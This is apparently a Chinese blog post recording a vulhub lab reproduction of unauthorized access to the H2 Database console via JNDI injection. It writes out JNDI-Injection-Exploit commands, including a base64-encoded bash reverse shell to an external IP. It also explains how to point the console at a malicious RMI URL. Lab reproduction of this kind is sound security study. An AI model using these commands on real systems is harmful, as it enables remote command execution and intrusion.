H2database 未授权访问 vulhub

最新推荐文章于 2024-08-13 00:00:00 发布
最新推荐文章于 2024-08-13 00:00:00 发布
阅读量415 收藏 6
点赞数 5
分类专栏: web安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/c0529/article/details/139624113
版权

参考:H2database-未授权访问漏洞复现_h2 database connection-CSDN博客

1.工具

虚拟机:kali+docker

java包:Release JNDI-Injection-Exploit v1.0 · welk1n/JNDI-Injection-Exploit · GitHub

这个包可能会报木马,如果发现没下载下来有可能是因为被屏了
被反弹shell的机子:可以就用kali,或者配一台外网服务器

2.复现

打开docker容器

访问http://虚拟机ip:8080/h2-console/

打开之后是一个访问的页面,我们需要用java语言驱动让这个网站主动访问其他主机并且执行命令,我们需要用到一开始写在最前面的工具进行生成rmi
工具基础使用方法:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C 命令 -A 攻击者的ip(监听者的ip,填你自己的)


java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC84LjEzMC4xMDcuMTEvNTU2NiAwPiYx}|{base64,-d}|{bash,-i}" -A 8.130.107.11//学了大佬的反弹shell,但是一举失败
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C touch /tmp/success -A 192.168.43.156//这条成功了

在驱动选择:javax.naming.InitialContext
url选择选择一个rmi填写
出现下方红色的字体就成功了,同时你的主机检测到了这个网站的访问我出现的一个问题就是反弹不出去,我想了想可能是要在我的外网上面java生成命令才对,但是等我反应过来,我已经把容器关掉了

这里参考大佬的:数据库安全-H2 database&Elasticsearch&CouchDB&Influxdb漏洞复现_h2database漏洞-CSDN博客

小狗学士
关注
专栏目录
【实战系列4】H2 Database Console授权访问/命令执行漏洞到msf内网提权渗透
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
04-13 1417
通过H2Database Console的命令执行漏洞,结合windows的powershell反弹shell,再利用msf提权并开启rdp服务,在管理员修改了默认的rdp端口3389的情况下,利用命令找到真正的rdp服务端口,远程连接控制目标主机。
服务攻防——数据库安全授权访问、弱口令
m0_61506558的博客
12-14 589
关于判断服务是否开放进行信息收集的内容,可能通过扫描工具,如果遇到WAF的话,通过常用搭建网站的组件进行尝试,或者通过特定服务提供的报错信息进行判断......由于基于 Erlang 的 JSON 解析器和基于 JavaScript 的 JSON 解析器的差异,在 1.7.0 之前的 Apache CouchDB 和 2.1.1 之前的 2.x 中,可以提交_users具有重复键的文档,roles用于数据库内的访问控制,包括特例_admin角色,表示管理用户。
数据库应用-H2database--授权访问&命令执行漏洞
XXokok的博客
11-26 587
数据库应用-H2database--授权访问&命令执行漏洞
5大数据库授权访问漏洞深度剖析【黑客最爱的‘甜点‘】
最新发布
2301_80064376的博客
08-13 1156
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。靶场Hadoop YARN ResourceManager 授权访问漏洞是一个严重的安全隐患,它潜伏在许多经正确配置的 Hadoop 集群中。这个漏洞的核心问题在于 YARN 的 ResourceManager 组件在默认情况下可能没有启用适当的访问控制机制。
H2 Database Console授权访问
zzzzz1284的博客
01-06 1038
H2 Database Console授权访问
H2 Database Console 授权访问
黑白的博客
12-20 4170
声明 好好学习,天天向上 漏洞描述 H2 database是一款Java内存数据库,多用于单元测试。H2 database自带一个Web管理页面,在Spirng开发中,如果我们设置如下选项,即可允许外部用户访问Web管理页面,且没有鉴权: spring.h2.console.enabled=true spring.h2.console.settings.web-allow-others=true 利用这个管理页面,我们可以进行JNDI注入攻击,进而在目标环境下执行任意命令。 影响范围 Spring Boot
H2 Database Console授权访问漏洞封堵
本博客纯属个人网络笔记,如对阁下有用,甚喜;否则,关掉即可,不喜勿喷。专心写代码,不做键盘侠!
07-05 316
H2 Database Console授权访问,默认情况下自动创建不存在的数据库,从而导致授权访问。网络上能搜到各种授权访问的教程,但是它怎么封堵呢?
H2 Database Console 授权访问复现
玄道的网安博客
01-22 2295
漏洞概述 H2 database是一款Java内存数据库,多用于单元测试。H2 database自带一个Web管理页面,在Spirng开发中,如果我们设置如下选项,即可允许外部用户访问Web管理页面,且没有鉴权: spring.h2.console.enabled=true spring.h2.console.settings.web-allow-others=true 利用这个管理页面,我们可以进行JNDI注入攻击,进而在目标环境下执行任意命令。 环境搭建 使用vulhub来安装...
红队攻防渗透技术实战流程:数据库安全:Redis&CouchDB&H2Database
HACKONE的博客
06-15 158
应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。Redis如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下授权访问Redis以及读取Redis的数据。对服务进行类别划分,通过服务功能理解,如数据库有帐号密码就有爆破利用方法,也可以针对服务公开的CVE进行漏洞测试及服务常见的错误安全配置导致的授权访问等。允许使用密钥登录,即可远程写入一个公钥,直接登录远程服务器。
万字渗透测试入门知识点,自学查漏补缺
yjwangan的博客
10-24 1074
万字渗透测试入门知识点,自学查漏补缺
H2db console 授权访问RCE 漏洞复现+利用(CVE-2022-23221)
0xSec
02-21 3021
H2 数据库控制台中的另一个经身份验证的 RCE 漏洞,在 v2.1.210+ 中修复。2.1.210 之前的 H2 控制台允许远程攻击者通过包含 IGNORE_UNKNOWN_SETTINGS=TRUE;INIT=RUNSCRIPT 子字符串的 jdbc:h2:mem JDBC URL 执行任意代码。
H2 Database Console授权访问漏洞复现+利用
0xSec
04-08 1897
H2 database是一款Java内存数据库,多用于单元测试。利用这个管理页面,我们可以进行JNDI注入攻击,进而在目标环境下执行任意命令。
H2database-授权访问漏洞复现
weixin_45366453的博客
06-29 2916
H2 database是一款Java内存数据库,多用于单元测试。默认端口:20051H2 database自带一个Web管理页面,在Spirng开发中,如果我们设置如下选项,即可允许外部用户访问Web管理页面,且没有鉴权: 利用这个管理页面,我们可以进行JNDI注入攻击,进而在目标环境下执行任意命令。执行如下命令启动一个Springboot + h2database环境:启动后,访问即可查看到H2 database的管理页面。下载JNDI-Injection-Exploithttps://github.co
Hadoop&hbase监控页面授权访问漏洞处理方案验证过程实现
weixin_42621434的博客
10-29 9206
Hadoop&hbase监控页面授权访问漏洞处理方案验证 Hadoop:监控页面授权登录配置步骤: 1 页面弹出框授权 1.1页面弹出框授权配置 1.上传附件的jar包hadoop-http-auth-e3base.jar到$HADOOP_HOME/share/hadoop/common目录下 并分发到另外两台主机 2.修改$HADOOP_HOME/etc/hadoop/core-sit...
服务攻防-数据库安全&Redis&CouchDB&H2database&授权访问&CVE漏洞
zyw268的博客
05-06 295
数据库应用-H2database--授权访问&CVE漏洞。数据库应用-Couchdb-授权越权&CVE漏洞。数据库应用-Redis-授权访问&CVE漏洞。
HBase无法给用户赋权的解决方案
a13568hki的博客
05-14 387
安装过程中hbase并没有任何特殊设置,只要在hdfs上创建一个/hbase目录,启动hbase master就会自动创建需要的文件。2.以开始以为语法有错误,不会啊,很简单的语法。经过测试几个命令发现,但凡和权限相关的命令,都失败了。之后删除zookeeper的hbase信息,和hdfs的hbase目录,重启hbase就好了。百度到一些建议,需要检查参数,在确认下面几个参数都设置正确的情况下,问题依旧。4.下面这句话,提醒了我,是不是hbase:acl丢失了?建表之后,在赋权的时候,发现有错误。
SpringBoot2.x系列教程45--整合H2数据库之代码实现
一一哥
04-02 637
SpringBoot2.x系列教程45--整合H2数据库之代码实现 作者:一一哥 我在上一章节中详细讲解了H2数据库,接下来我带大家在Spring Boot中整合H2数据库,实现代码操作。 一. Spring Boot中整合H2数据库 1. 创建Web项目 我们按照之前的经验,创建一个web程序,并将之改造成Spring Boot项目,具体过程略。 2. 添加依赖包 <de...
H2Database数据类型详解
H2Database数据类型.pdf”涵盖了H2数据库中的各种数据类型,包括整数、布尔型、微整数、小整数、大整数、标识符、货币数、双精度实数、实数、时间、日期、时间戳、二进制、其他类型、可变字符串、不区分大小写的可...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值